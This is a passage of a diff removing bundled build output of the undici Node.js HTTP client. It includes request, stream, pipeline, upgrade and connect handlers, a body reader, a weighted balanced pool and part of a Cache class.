removeSignal(this) - - this.callback = null - - let headers = rawHeaders - // Indicates is an HTTP2Session - if (headers != null) { - headers = this.responseHeaders === 'raw' ? 
util.parseRawHeaders(rawHeaders) : util.parseHeaders(rawHeaders) - } - - this.runInAsyncScope(callback, null, null, { - statusCode, - headers, - socket, - opaque, - context - }) - } - - onError (err) { - const { callback, opaque } = this - - removeSignal(this) - - if (callback) { - this.callback = null - queueMicrotask(() => { - this.runInAsyncScope(callback, null, err, { opaque }) - }) - } - } -} - -function connect (opts, callback) { - if (callback === undefined) { - return new Promise((resolve, reject) => { - connect.call(this, opts, (err, data) => { - return err ? reject(err) : resolve(data) - }) - }) - } - - try { - const connectHandler = new ConnectHandler(opts, callback) - this.dispatch({ ...opts, method: 'CONNECT' }, connectHandler) - } catch (err) { - if (typeof callback !== 'function') { - throw err - } - const opaque = opts && opts.opaque - queueMicrotask(() => callback(err, { opaque })) - } -} - -module.exports = connect - - -/***/ }), - -/***/ 8752: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { - Readable, - Duplex, - PassThrough -} = __nccwpck_require__(2781) -const { - InvalidArgumentError, - InvalidReturnValueError, - RequestAbortedError -} = __nccwpck_require__(8045) -const util = __nccwpck_require__(3983) -const { AsyncResource } = __nccwpck_require__(852) -const { addSignal, removeSignal } = __nccwpck_require__(7032) -const assert = __nccwpck_require__(9491) - -const kResume = Symbol('resume') - -class PipelineRequest extends Readable { - constructor () { - super({ autoDestroy: true }) - - this[kResume] = null - } - - _read () { - const { [kResume]: resume } = this - - if (resume) { - this[kResume] = null - resume() - } - } - - _destroy (err, callback) { - this._read() - - callback(err) - } -} - -class PipelineResponse extends Readable { - constructor (resume) { - super({ autoDestroy: true }) - this[kResume] = resume - } - - _read () { - this[kResume]() - } - - _destroy (err, callback) { - if 
(!err && !this._readableState.endEmitted) { - err = new RequestAbortedError() - } - - callback(err) - } -} - -class PipelineHandler extends AsyncResource { - constructor (opts, handler) { - if (!opts || typeof opts !== 'object') { - throw new InvalidArgumentError('invalid opts') - } - - if (typeof handler !== 'function') { - throw new InvalidArgumentError('invalid handler') - } - - const { signal, method, opaque, onInfo, responseHeaders } = opts - - if (signal && typeof signal.on !== 'function' && typeof signal.addEventListener !== 'function') { - throw new InvalidArgumentError('signal must be an EventEmitter or EventTarget') - } - - if (method === 'CONNECT') { - throw new InvalidArgumentError('invalid method') - } - - if (onInfo && typeof onInfo !== 'function') { - throw new InvalidArgumentError('invalid onInfo callback') - } - - super('UNDICI_PIPELINE') - - this.opaque = opaque || null - this.responseHeaders = responseHeaders || null - this.handler = handler - this.abort = null - this.context = null - this.onInfo = onInfo || null - - this.req = new PipelineRequest().on('error', util.nop) - - this.ret = new Duplex({ - readableObjectMode: opts.objectMode, - autoDestroy: true, - read: () => { - const { body } = this - - if (body && body.resume) { - body.resume() - } - }, - write: (chunk, encoding, callback) => { - const { req } = this - - if (req.push(chunk, encoding) || req._readableState.destroyed) { - callback() - } else { - req[kResume] = callback - } - }, - destroy: (err, callback) => { - const { body, req, res, ret, abort } = this - - if (!err && !ret._readableState.endEmitted) { - err = new RequestAbortedError() - } - - if (abort && err) { - abort() - } - - util.destroy(body, err) - util.destroy(req, err) - util.destroy(res, err) - - removeSignal(this) - - callback(err) - } - }).on('prefinish', () => { - const { req } = this - - // Node < 15 does not call _final in same tick. 
- req.push(null) - }) - - this.res = null - - addSignal(this, signal) - } - - onConnect (abort, context) { - const { ret, res } = this - - assert(!res, 'pipeline cannot be retried') - - if (ret.destroyed) { - throw new RequestAbortedError() - } - - this.abort = abort - this.context = context - } - - onHeaders (statusCode, rawHeaders, resume) { - const { opaque, handler, context } = this - - if (statusCode < 200) { - if (this.onInfo) { - const headers = this.responseHeaders === 'raw' ? util.parseRawHeaders(rawHeaders) : util.parseHeaders(rawHeaders) - this.onInfo({ statusCode, headers }) - } - return - } - - this.res = new PipelineResponse(resume) - - let body - try { - this.handler = null - const headers = this.responseHeaders === 'raw' ? util.parseRawHeaders(rawHeaders) : util.parseHeaders(rawHeaders) - body = this.runInAsyncScope(handler, null, { - statusCode, - headers, - opaque, - body: this.res, - context - }) - } catch (err) { - this.res.on('error', util.nop) - throw err - } - - if (!body || typeof body.on !== 'function') { - throw new InvalidReturnValueError('expected Readable') - } - - body - .on('data', (chunk) => { - const { ret, body } = this - - if (!ret.push(chunk) && body.pause) { - body.pause() - } - }) - .on('error', (err) => { - const { ret } = this - - util.destroy(ret, err) - }) - .on('end', () => { - const { ret } = this - - ret.push(null) - }) - .on('close', () => { - const { ret } = this - - if (!ret._readableState.ended) { - util.destroy(ret, new RequestAbortedError()) - } - }) - - this.body = body - } - - onData (chunk) { - const { res } = this - return res.push(chunk) - } - - onComplete (trailers) { - const { res } = this - res.push(null) - } - - onError (err) { - const { ret } = this - this.handler = null - util.destroy(ret, err) - } -} - -function pipeline (opts, handler) { - try { - const pipelineHandler = new PipelineHandler(opts, handler) - this.dispatch({ ...opts, body: pipelineHandler.req }, pipelineHandler) - return 
pipelineHandler.ret - } catch (err) { - return new PassThrough().destroy(err) - } -} - -module.exports = pipeline - - -/***/ }), - -/***/ 5448: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const Readable = __nccwpck_require__(3858) -const { - InvalidArgumentError, - RequestAbortedError -} = __nccwpck_require__(8045) -const util = __nccwpck_require__(3983) -const { getResolveErrorBodyCallback } = __nccwpck_require__(7474) -const { AsyncResource } = __nccwpck_require__(852) -const { addSignal, removeSignal } = __nccwpck_require__(7032) - -class RequestHandler extends AsyncResource { - constructor (opts, callback) { - if (!opts || typeof opts !== 'object') { - throw new InvalidArgumentError('invalid opts') - } - - const { signal, method, opaque, body, onInfo, responseHeaders, throwOnError, highWaterMark } = opts - - try { - if (typeof callback !== 'function') { - throw new InvalidArgumentError('invalid callback') - } - - if (highWaterMark && (typeof highWaterMark !== 'number' || highWaterMark < 0)) { - throw new InvalidArgumentError('invalid highWaterMark') - } - - if (signal && typeof signal.on !== 'function' && typeof signal.addEventListener !== 'function') { - throw new InvalidArgumentError('signal must be an EventEmitter or EventTarget') - } - - if (method === 'CONNECT') { - throw new InvalidArgumentError('invalid method') - } - - if (onInfo && typeof onInfo !== 'function') { - throw new InvalidArgumentError('invalid onInfo callback') - } - - super('UNDICI_REQUEST') - } catch (err) { - if (util.isStream(body)) { - util.destroy(body.on('error', util.nop), err) - } - throw err - } - - this.responseHeaders = responseHeaders || null - this.opaque = opaque || null - this.callback = callback - this.res = null - this.abort = null - this.body = body - this.trailers = {} - this.context = null - this.onInfo = onInfo || null - this.throwOnError = throwOnError - this.highWaterMark = highWaterMark - - if (util.isStream(body)) { - 
body.on('error', (err) => { - this.onError(err) - }) - } - - addSignal(this, signal) - } - - onConnect (abort, context) { - if (!this.callback) { - throw new RequestAbortedError() - } - - this.abort = abort - this.context = context - } - - onHeaders (statusCode, rawHeaders, resume, statusMessage) { - const { callback, opaque, abort, context, responseHeaders, highWaterMark } = this - - const headers = responseHeaders === 'raw' ? util.parseRawHeaders(rawHeaders) : util.parseHeaders(rawHeaders) - - if (statusCode < 200) { - if (this.onInfo) { - this.onInfo({ statusCode, headers }) - } - return - } - - const parsedHeaders = responseHeaders === 'raw' ? util.parseHeaders(rawHeaders) : headers - const contentType = parsedHeaders['content-type'] - const body = new Readable({ resume, abort, contentType, highWaterMark }) - - this.callback = null - this.res = body - if (callback !== null) { - if (this.throwOnError && statusCode >= 400) { - this.runInAsyncScope(getResolveErrorBodyCallback, null, - { callback, body, contentType, statusCode, statusMessage, headers } - ) - } else { - this.runInAsyncScope(callback, null, null, { - statusCode, - headers, - trailers: this.trailers, - opaque, - body, - context - }) - } - } - } - - onData (chunk) { - const { res } = this - return res.push(chunk) - } - - onComplete (trailers) { - const { res } = this - - removeSignal(this) - - util.parseHeaders(trailers, this.trailers) - - res.push(null) - } - - onError (err) { - const { res, callback, body, opaque } = this - - removeSignal(this) - - if (callback) { - // TODO: Does this need queueMicrotask? - this.callback = null - queueMicrotask(() => { - this.runInAsyncScope(callback, null, err, { opaque }) - }) - } - - if (res) { - this.res = null - // Ensure all queued handlers are invoked before destroying res. 
- queueMicrotask(() => { - util.destroy(res, err) - }) - } - - if (body) { - this.body = null - util.destroy(body, err) - } - } -} - -function request (opts, callback) { - if (callback === undefined) { - return new Promise((resolve, reject) => { - request.call(this, opts, (err, data) => { - return err ? reject(err) : resolve(data) - }) - }) - } - - try { - this.dispatch(opts, new RequestHandler(opts, callback)) - } catch (err) { - if (typeof callback !== 'function') { - throw err - } - const opaque = opts && opts.opaque - queueMicrotask(() => callback(err, { opaque })) - } -} - -module.exports = request -module.exports.RequestHandler = RequestHandler - - -/***/ }), - -/***/ 5395: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { finished, PassThrough } = __nccwpck_require__(2781) -const { - InvalidArgumentError, - InvalidReturnValueError, - RequestAbortedError -} = __nccwpck_require__(8045) -const util = __nccwpck_require__(3983) -const { getResolveErrorBodyCallback } = __nccwpck_require__(7474) -const { AsyncResource } = __nccwpck_require__(852) -const { addSignal, removeSignal } = __nccwpck_require__(7032) - -class StreamHandler extends AsyncResource { - constructor (opts, factory, callback) { - if (!opts || typeof opts !== 'object') { - throw new InvalidArgumentError('invalid opts') - } - - const { signal, method, opaque, body, onInfo, responseHeaders, throwOnError } = opts - - try { - if (typeof callback !== 'function') { - throw new InvalidArgumentError('invalid callback') - } - - if (typeof factory !== 'function') { - throw new InvalidArgumentError('invalid factory') - } - - if (signal && typeof signal.on !== 'function' && typeof signal.addEventListener !== 'function') { - throw new InvalidArgumentError('signal must be an EventEmitter or EventTarget') - } - - if (method === 'CONNECT') { - throw new InvalidArgumentError('invalid method') - } - - if (onInfo && typeof onInfo !== 'function') { - throw new 
InvalidArgumentError('invalid onInfo callback') - } - - super('UNDICI_STREAM') - } catch (err) { - if (util.isStream(body)) { - util.destroy(body.on('error', util.nop), err) - } - throw err - } - - this.responseHeaders = responseHeaders || null - this.opaque = opaque || null - this.factory = factory - this.callback = callback - this.res = null - this.abort = null - this.context = null - this.trailers = null - this.body = body - this.onInfo = onInfo || null - this.throwOnError = throwOnError || false - - if (util.isStream(body)) { - body.on('error', (err) => { - this.onError(err) - }) - } - - addSignal(this, signal) - } - - onConnect (abort, context) { - if (!this.callback) { - throw new RequestAbortedError() - } - - this.abort = abort - this.context = context - } - - onHeaders (statusCode, rawHeaders, resume, statusMessage) { - const { factory, opaque, context, callback, responseHeaders } = this - - const headers = responseHeaders === 'raw' ? util.parseRawHeaders(rawHeaders) : util.parseHeaders(rawHeaders) - - if (statusCode < 200) { - if (this.onInfo) { - this.onInfo({ statusCode, headers }) - } - return - } - - this.factory = null - - let res - - if (this.throwOnError && statusCode >= 400) { - const parsedHeaders = responseHeaders === 'raw' ? util.parseHeaders(rawHeaders) : headers - const contentType = parsedHeaders['content-type'] - res = new PassThrough() - - this.callback = null - this.runInAsyncScope(getResolveErrorBodyCallback, null, - { callback, body: res, contentType, statusCode, statusMessage, headers } - ) - } else { - if (factory === null) { - return - } - - res = this.runInAsyncScope(factory, null, { - statusCode, - headers, - opaque, - context - }) - - if ( - !res || - typeof res.write !== 'function' || - typeof res.end !== 'function' || - typeof res.on !== 'function' - ) { - throw new InvalidReturnValueError('expected Writable') - } - - // TODO: Avoid finished. It registers an unnecessary amount of listeners. 
- finished(res, { readable: false }, (err) => { - const { callback, res, opaque, trailers, abort } = this - - this.res = null - if (err || !res.readable) { - util.destroy(res, err) - } - - this.callback = null - this.runInAsyncScope(callback, null, err || null, { opaque, trailers }) - - if (err) { - abort() - } - }) - } - - res.on('drain', resume) - - this.res = res - - const needDrain = res.writableNeedDrain !== undefined - ? res.writableNeedDrain - : res._writableState && res._writableState.needDrain - - return needDrain !== true - } - - onData (chunk) { - const { res } = this - - return res ? res.write(chunk) : true - } - - onComplete (trailers) { - const { res } = this - - removeSignal(this) - - if (!res) { - return - } - - this.trailers = util.parseHeaders(trailers) - - res.end() - } - - onError (err) { - const { res, callback, opaque, body } = this - - removeSignal(this) - - this.factory = null - - if (res) { - this.res = null - util.destroy(res, err) - } else if (callback) { - this.callback = null - queueMicrotask(() => { - this.runInAsyncScope(callback, null, err, { opaque }) - }) - } - - if (body) { - this.body = null - util.destroy(body, err) - } - } -} - -function stream (opts, factory, callback) { - if (callback === undefined) { - return new Promise((resolve, reject) => { - stream.call(this, opts, factory, (err, data) => { - return err ? 
reject(err) : resolve(data) - }) - }) - } - - try { - this.dispatch(opts, new StreamHandler(opts, factory, callback)) - } catch (err) { - if (typeof callback !== 'function') { - throw err - } - const opaque = opts && opts.opaque - queueMicrotask(() => callback(err, { opaque })) - } -} - -module.exports = stream - - -/***/ }), - -/***/ 6923: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { InvalidArgumentError, RequestAbortedError, SocketError } = __nccwpck_require__(8045) -const { AsyncResource } = __nccwpck_require__(852) -const util = __nccwpck_require__(3983) -const { addSignal, removeSignal } = __nccwpck_require__(7032) -const assert = __nccwpck_require__(9491) - -class UpgradeHandler extends AsyncResource { - constructor (opts, callback) { - if (!opts || typeof opts !== 'object') { - throw new InvalidArgumentError('invalid opts') - } - - if (typeof callback !== 'function') { - throw new InvalidArgumentError('invalid callback') - } - - const { signal, opaque, responseHeaders } = opts - - if (signal && typeof signal.on !== 'function' && typeof signal.addEventListener !== 'function') { - throw new InvalidArgumentError('signal must be an EventEmitter or EventTarget') - } - - super('UNDICI_UPGRADE') - - this.responseHeaders = responseHeaders || null - this.opaque = opaque || null - this.callback = callback - this.abort = null - this.context = null - - addSignal(this, signal) - } - - onConnect (abort, context) { - if (!this.callback) { - throw new RequestAbortedError() - } - - this.abort = abort - this.context = null - } - - onHeaders () { - throw new SocketError('bad upgrade', null) - } - - onUpgrade (statusCode, rawHeaders, socket) { - const { callback, opaque, context } = this - - assert.strictEqual(statusCode, 101) - - removeSignal(this) - - this.callback = null - const headers = this.responseHeaders === 'raw' ? 
util.parseRawHeaders(rawHeaders) : util.parseHeaders(rawHeaders) - this.runInAsyncScope(callback, null, null, { - headers, - socket, - opaque, - context - }) - } - - onError (err) { - const { callback, opaque } = this - - removeSignal(this) - - if (callback) { - this.callback = null - queueMicrotask(() => { - this.runInAsyncScope(callback, null, err, { opaque }) - }) - } - } -} - -function upgrade (opts, callback) { - if (callback === undefined) { - return new Promise((resolve, reject) => { - upgrade.call(this, opts, (err, data) => { - return err ? reject(err) : resolve(data) - }) - }) - } - - try { - const upgradeHandler = new UpgradeHandler(opts, callback) - this.dispatch({ - ...opts, - method: opts.method || 'GET', - upgrade: opts.protocol || 'Websocket' - }, upgradeHandler) - } catch (err) { - if (typeof callback !== 'function') { - throw err - } - const opaque = opts && opts.opaque - queueMicrotask(() => callback(err, { opaque })) - } -} - -module.exports = upgrade - - -/***/ }), - -/***/ 4059: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -module.exports.request = __nccwpck_require__(5448) -module.exports.stream = __nccwpck_require__(5395) -module.exports.pipeline = __nccwpck_require__(8752) -module.exports.upgrade = __nccwpck_require__(6923) -module.exports.connect = __nccwpck_require__(9744) - - -/***/ }), - -/***/ 3858: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; -// Ported from https://github.com/nodejs/undici/pull/907 - - - -const assert = __nccwpck_require__(9491) -const { Readable } = __nccwpck_require__(2781) -const { RequestAbortedError, NotSupportedError, InvalidArgumentError } = __nccwpck_require__(8045) -const util = __nccwpck_require__(3983) -const { ReadableStreamFrom, toUSVString } = __nccwpck_require__(3983) - -let Blob - -const kConsume = Symbol('kConsume') -const kReading = Symbol('kReading') -const kBody = Symbol('kBody') -const kAbort = Symbol('abort') 
-const kContentType = Symbol('kContentType') - -const noop = () => {} - -module.exports = class BodyReadable extends Readable { - constructor ({ - resume, - abort, - contentType = '', - highWaterMark = 64 * 1024 // Same as nodejs fs streams. - }) { - super({ - autoDestroy: true, - read: resume, - highWaterMark - }) - - this._readableState.dataEmitted = false - - this[kAbort] = abort - this[kConsume] = null - this[kBody] = null - this[kContentType] = contentType - - // Is stream being consumed through Readable API? - // This is an optimization so that we avoid checking - // for 'data' and 'readable' listeners in the hot path - // inside push(). - this[kReading] = false - } - - destroy (err) { - if (this.destroyed) { - // Node < 16 - return this - } - - if (!err && !this._readableState.endEmitted) { - err = new RequestAbortedError() - } - - if (err) { - this[kAbort]() - } - - return super.destroy(err) - } - - emit (ev, ...args) { - if (ev === 'data') { - // Node < 16.7 - this._readableState.dataEmitted = true - } else if (ev === 'error') { - // Node < 16 - this._readableState.errorEmitted = true - } - return super.emit(ev, ...args) - } - - on (ev, ...args) { - if (ev === 'data' || ev === 'readable') { - this[kReading] = true - } - return super.on(ev, ...args) - } - - addListener (ev, ...args) { - return this.on(ev, ...args) - } - - off (ev, ...args) { - const ret = super.off(ev, ...args) - if (ev === 'data' || ev === 'readable') { - this[kReading] = ( - this.listenerCount('data') > 0 || - this.listenerCount('readable') > 0 - ) - } - return ret - } - - removeListener (ev, ...args) { - return this.off(ev, ...args) - } - - push (chunk) { - if (this[kConsume] && chunk !== null && this.readableLength === 0) { - consumePush(this[kConsume], chunk) - return this[kReading] ? 
super.push(chunk) : true - } - return super.push(chunk) - } - - // https://fetch.spec.whatwg.org/#dom-body-text - async text () { - return consume(this, 'text') - } - - // https://fetch.spec.whatwg.org/#dom-body-json - async json () { - return consume(this, 'json') - } - - // https://fetch.spec.whatwg.org/#dom-body-blob - async blob () { - return consume(this, 'blob') - } - - // https://fetch.spec.whatwg.org/#dom-body-arraybuffer - async arrayBuffer () { - return consume(this, 'arrayBuffer') - } - - // https://fetch.spec.whatwg.org/#dom-body-formdata - async formData () { - // TODO: Implement. - throw new NotSupportedError() - } - - // https://fetch.spec.whatwg.org/#dom-body-bodyused - get bodyUsed () { - return util.isDisturbed(this) - } - - // https://fetch.spec.whatwg.org/#dom-body-body - get body () { - if (!this[kBody]) { - this[kBody] = ReadableStreamFrom(this) - if (this[kConsume]) { - // TODO: Is this the best way to force a lock? - this[kBody].getReader() // Ensure stream is locked. - assert(this[kBody].locked) - } - } - return this[kBody] - } - - dump (opts) { - let limit = opts && Number.isFinite(opts.limit) ? opts.limit : 262144 - const signal = opts && opts.signal - - if (signal) { - try { - if (typeof signal !== 'object' || !('aborted' in signal)) { - throw new InvalidArgumentError('signal must be an AbortSignal') - } - util.throwIfAborted(signal) - } catch (err) { - return Promise.reject(err) - } - } - - if (this.closed) { - return Promise.resolve(null) - } - - return new Promise((resolve, reject) => { - const signalListenerCleanup = signal - ? 
util.addAbortListener(signal, () => { - this.destroy() - }) - : noop - - this - .on('close', function () { - signalListenerCleanup() - if (signal && signal.aborted) { - reject(signal.reason || Object.assign(new Error('The operation was aborted'), { name: 'AbortError' })) - } else { - resolve(null) - } - }) - .on('error', noop) - .on('data', function (chunk) { - limit -= chunk.length - if (limit <= 0) { - this.destroy() - } - }) - .resume() - }) - } -} - -// https://streams.spec.whatwg.org/#readablestream-locked -function isLocked (self) { - // Consume is an implicit lock. - return (self[kBody] && self[kBody].locked === true) || self[kConsume] -} - -// https://fetch.spec.whatwg.org/#body-unusable -function isUnusable (self) { - return util.isDisturbed(self) || isLocked(self) -} - -async function consume (stream, type) { - if (isUnusable(stream)) { - throw new TypeError('unusable') - } - - assert(!stream[kConsume]) - - return new Promise((resolve, reject) => { - stream[kConsume] = { - type, - stream, - resolve, - reject, - length: 0, - body: [] - } - - stream - .on('error', function (err) { - consumeFinish(this[kConsume], err) - }) - .on('close', function () { - if (this[kConsume].body !== null) { - consumeFinish(this[kConsume], new RequestAbortedError()) - } - }) - - process.nextTick(consumeStart, stream[kConsume]) - }) -} - -function consumeStart (consume) { - if (consume.body === null) { - return - } - - const { _readableState: state } = consume.stream - - for (const chunk of state.buffer) { - consumePush(consume, chunk) - } - - if (state.endEmitted) { - consumeEnd(this[kConsume]) - } else { - consume.stream.on('end', function () { - consumeEnd(this[kConsume]) - }) - } - - consume.stream.resume() - - while (consume.stream.read() != null) { - // Loop - } -} - -function consumeEnd (consume) { - const { type, body, resolve, stream, length } = consume - - try { - if (type === 'text') { - resolve(toUSVString(Buffer.concat(body))) - } else if (type === 'json') { - 
resolve(JSON.parse(Buffer.concat(body))) - } else if (type === 'arrayBuffer') { - const dst = new Uint8Array(length) - - let pos = 0 - for (const buf of body) { - dst.set(buf, pos) - pos += buf.byteLength - } - - resolve(dst.buffer) - } else if (type === 'blob') { - if (!Blob) { - Blob = (__nccwpck_require__(4300).Blob) - } - resolve(new Blob(body, { type: stream[kContentType] })) - } - - consumeFinish(consume) - } catch (err) { - stream.destroy(err) - } -} - -function consumePush (consume, chunk) { - consume.length += chunk.length - consume.body.push(chunk) -} - -function consumeFinish (consume, err) { - if (consume.body === null) { - return - } - - if (err) { - consume.reject(err) - } else { - consume.resolve() - } - - consume.type = null - consume.stream = null - consume.resolve = null - consume.reject = null - consume.length = 0 - consume.body = null -} - - -/***/ }), - -/***/ 7474: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -const assert = __nccwpck_require__(9491) -const { - ResponseStatusCodeError -} = __nccwpck_require__(8045) -const { toUSVString } = __nccwpck_require__(3983) - -async function getResolveErrorBodyCallback ({ callback, body, contentType, statusCode, statusMessage, headers }) { - assert(body) - - let chunks = [] - let limit = 0 - - for await (const chunk of body) { - chunks.push(chunk) - limit += chunk.length - if (limit > 128 * 1024) { - chunks = null - break - } - } - - if (statusCode === 204 || !contentType || !chunks) { - process.nextTick(callback, new ResponseStatusCodeError(`Response status code ${statusCode}${statusMessage ? `: ${statusMessage}` : ''}`, statusCode, headers)) - return - } - - try { - if (contentType.startsWith('application/json')) { - const payload = JSON.parse(toUSVString(Buffer.concat(chunks))) - process.nextTick(callback, new ResponseStatusCodeError(`Response status code ${statusCode}${statusMessage ? 
`: ${statusMessage}` : ''}`, statusCode, headers, payload)) - return - } - - if (contentType.startsWith('text/')) { - const payload = toUSVString(Buffer.concat(chunks)) - process.nextTick(callback, new ResponseStatusCodeError(`Response status code ${statusCode}${statusMessage ? `: ${statusMessage}` : ''}`, statusCode, headers, payload)) - return - } - } catch (err) { - // Process in a fallback if error - } - - process.nextTick(callback, new ResponseStatusCodeError(`Response status code ${statusCode}${statusMessage ? `: ${statusMessage}` : ''}`, statusCode, headers)) -} - -module.exports = { getResolveErrorBodyCallback } - - -/***/ }), - -/***/ 7931: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { - BalancedPoolMissingUpstreamError, - InvalidArgumentError -} = __nccwpck_require__(8045) -const { - PoolBase, - kClients, - kNeedDrain, - kAddClient, - kRemoveClient, - kGetDispatcher -} = __nccwpck_require__(3198) -const Pool = __nccwpck_require__(4634) -const { kUrl, kInterceptors } = __nccwpck_require__(2785) -const { parseOrigin } = __nccwpck_require__(3983) -const kFactory = Symbol('factory') - -const kOptions = Symbol('options') -const kGreatestCommonDivisor = Symbol('kGreatestCommonDivisor') -const kCurrentWeight = Symbol('kCurrentWeight') -const kIndex = Symbol('kIndex') -const kWeight = Symbol('kWeight') -const kMaxWeightPerServer = Symbol('kMaxWeightPerServer') -const kErrorPenalty = Symbol('kErrorPenalty') - -function getGreatestCommonDivisor (a, b) { - if (b === 0) return a - return getGreatestCommonDivisor(b, a % b) -} - -function defaultFactory (origin, opts) { - return new Pool(origin, opts) -} - -class BalancedPool extends PoolBase { - constructor (upstreams = [], { factory = defaultFactory, ...opts } = {}) { - super() - - this[kOptions] = opts - this[kIndex] = -1 - this[kCurrentWeight] = 0 - - this[kMaxWeightPerServer] = this[kOptions].maxWeightPerServer || 100 - this[kErrorPenalty] = 
this[kOptions].errorPenalty || 15 - - if (!Array.isArray(upstreams)) { - upstreams = [upstreams] - } - - if (typeof factory !== 'function') { - throw new InvalidArgumentError('factory must be a function.') - } - - this[kInterceptors] = opts.interceptors && opts.interceptors.BalancedPool && Array.isArray(opts.interceptors.BalancedPool) - ? opts.interceptors.BalancedPool - : [] - this[kFactory] = factory - - for (const upstream of upstreams) { - this.addUpstream(upstream) - } - this._updateBalancedPoolStats() - } - - addUpstream (upstream) { - const upstreamOrigin = parseOrigin(upstream).origin - - if (this[kClients].find((pool) => ( - pool[kUrl].origin === upstreamOrigin && - pool.closed !== true && - pool.destroyed !== true - ))) { - return this - } - const pool = this[kFactory](upstreamOrigin, Object.assign({}, this[kOptions])) - - this[kAddClient](pool) - pool.on('connect', () => { - pool[kWeight] = Math.min(this[kMaxWeightPerServer], pool[kWeight] + this[kErrorPenalty]) - }) - - pool.on('connectionError', () => { - pool[kWeight] = Math.max(1, pool[kWeight] - this[kErrorPenalty]) - this._updateBalancedPoolStats() - }) - - pool.on('disconnect', (...args) => { - const err = args[2] - if (err && err.code === 'UND_ERR_SOCKET') { - // decrease the weight of the pool. 
- pool[kWeight] = Math.max(1, pool[kWeight] - this[kErrorPenalty]) - this._updateBalancedPoolStats() - } - }) - - for (const client of this[kClients]) { - client[kWeight] = this[kMaxWeightPerServer] - } - - this._updateBalancedPoolStats() - - return this - } - - _updateBalancedPoolStats () { - this[kGreatestCommonDivisor] = this[kClients].map(p => p[kWeight]).reduce(getGreatestCommonDivisor, 0) - } - - removeUpstream (upstream) { - const upstreamOrigin = parseOrigin(upstream).origin - - const pool = this[kClients].find((pool) => ( - pool[kUrl].origin === upstreamOrigin && - pool.closed !== true && - pool.destroyed !== true - )) - - if (pool) { - this[kRemoveClient](pool) - } - - return this - } - - get upstreams () { - return this[kClients] - .filter(dispatcher => dispatcher.closed !== true && dispatcher.destroyed !== true) - .map((p) => p[kUrl].origin) - } - - [kGetDispatcher] () { - // We validate that pools is greater than 0, - // otherwise we would have to wait until an upstream - // is added, which might never happen. - if (this[kClients].length === 0) { - throw new BalancedPoolMissingUpstreamError() - } - - const dispatcher = this[kClients].find(dispatcher => ( - !dispatcher[kNeedDrain] && - dispatcher.closed !== true && - dispatcher.destroyed !== true - )) - - if (!dispatcher) { - return - } - - const allClientsBusy = this[kClients].map(pool => pool[kNeedDrain]).reduce((a, b) => a && b, true) - - if (allClientsBusy) { - return - } - - let counter = 0 - - let maxWeightIndex = this[kClients].findIndex(pool => !pool[kNeedDrain]) - - while (counter++ < this[kClients].length) { - this[kIndex] = (this[kIndex] + 1) % this[kClients].length - const pool = this[kClients][this[kIndex]] - - // find pool index with the largest weight - if (pool[kWeight] > this[kClients][maxWeightIndex][kWeight] && !pool[kNeedDrain]) { - maxWeightIndex = this[kIndex] - } - - // decrease the current weight every `this[kClients].length`. 
- if (this[kIndex] === 0) { - // Set the current weight to the next lower weight. - this[kCurrentWeight] = this[kCurrentWeight] - this[kGreatestCommonDivisor] - - if (this[kCurrentWeight] <= 0) { - this[kCurrentWeight] = this[kMaxWeightPerServer] - } - } - if (pool[kWeight] >= this[kCurrentWeight] && (!pool[kNeedDrain])) { - return pool - } - } - - this[kCurrentWeight] = this[kClients][maxWeightIndex][kWeight] - this[kIndex] = maxWeightIndex - return this[kClients][maxWeightIndex] - } -} - -module.exports = BalancedPool - - -/***/ }), - -/***/ 6101: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { kConstruct } = __nccwpck_require__(9174) -const { urlEquals, fieldValues: getFieldValues } = __nccwpck_require__(2396) -const { kEnumerableProperty, isDisturbed } = __nccwpck_require__(3983) -const { kHeadersList } = __nccwpck_require__(2785) -const { webidl } = __nccwpck_require__(1744) -const { Response, cloneResponse } = __nccwpck_require__(7823) -const { Request } = __nccwpck_require__(8359) -const { kState, kHeaders, kGuard, kRealm } = __nccwpck_require__(5861) -const { fetching } = __nccwpck_require__(4881) -const { urlIsHttpHttpsScheme, createDeferredPromise, readAllBytes } = __nccwpck_require__(2538) -const assert = __nccwpck_require__(9491) -const { getGlobalDispatcher } = __nccwpck_require__(1892) - -/** - * @see https://w3c.github.io/ServiceWorker/#dfn-cache-batch-operation - * @typedef {Object} CacheBatchOperation - * @property {'delete' | 'put'} type - * @property {any} request - * @property {any} response - * @property {import('../../types/cache').CacheQueryOptions} options - */ - -/** - * @see https://w3c.github.io/ServiceWorker/#dfn-request-response-list - * @typedef {[any, any][]} requestResponseList - */ - -class Cache { - /** - * @see https://w3c.github.io/ServiceWorker/#dfn-relevant-request-response-list - * @type {requestResponseList} - */ - #relevantRequestResponseList - - constructor () { - if 
(arguments[0] !== kConstruct) { - webidl.illegalConstructor() - } - - this.#relevantRequestResponseList = arguments[1] - } - - async match (request, options = {}) { - webidl.brandCheck(this, Cache) - webidl.argumentLengthCheck(arguments, 1, { header: 'Cache.match' }) - - request = webidl.converters.RequestInfo(request) - options = webidl.converters.CacheQueryOptions(options) - - const p = await this.matchAll(request, options) - - if (p.length === 0) { - return - } - - return p[0] - } - - async matchAll (request = undefined, options = {}) { - webidl.brandCheck(this, Cache) - - if (request !== undefined) request = webidl.converters.RequestInfo(request) - options = webidl.converters.CacheQueryOptions(options) - - // 1. - let r = null - - // 2. - if (request !== undefined) { - if (request instanceof Request) { - // 2.1.1 - r = request[kState] - - // 2.1.2 - if (r.method !== 'GET' && !options.ignoreMethod) { - return [] - } - } else if (typeof request === 'string') { - // 2.2.1 - r = new Request(request)[kState] - } - } - - // 5. - // 5.1 - const responses = [] - - // 5.2 - if (request === undefined) { - // 5.2.1 - for (const requestResponse of this.#relevantRequestResponseList) { - responses.push(requestResponse[1]) - } - } else { // 5.3 - // 5.3.1 - const requestResponses = this.#queryCache(r, options) - - // 5.3.2 - for (const requestResponse of requestResponses) { - responses.push(requestResponse[1]) - } - } - - // 5.4 - // We don't implement CORs so we don't need to loop over the responses, 